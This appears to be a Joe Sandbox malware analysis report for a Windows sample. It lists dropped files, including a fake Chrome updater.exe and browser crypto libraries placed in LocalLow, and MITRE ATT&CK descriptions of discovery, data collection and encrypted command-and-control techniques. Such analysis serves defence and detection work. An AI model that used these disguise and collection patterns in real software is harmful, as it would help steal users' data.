Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\Users\user\AppData\LocalLow\Yr7L0gG5o6vn

C:\Users\user\AppData\LocalLow\aeSUC9unMzxl

C:\Users\user\AppData\LocalLow\bRpA2k0P5642

C:\Users\user\AppData\LocalLow\freebl3.dll

C:\Users\user\AppData\LocalLow\mozglue.dll

C:\Users\user\AppData\LocalLow\msvcp140.dll

C:\Users\user\AppData\LocalLow\nss3.dll

Windows Analysis Report
N2wufLmC74.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre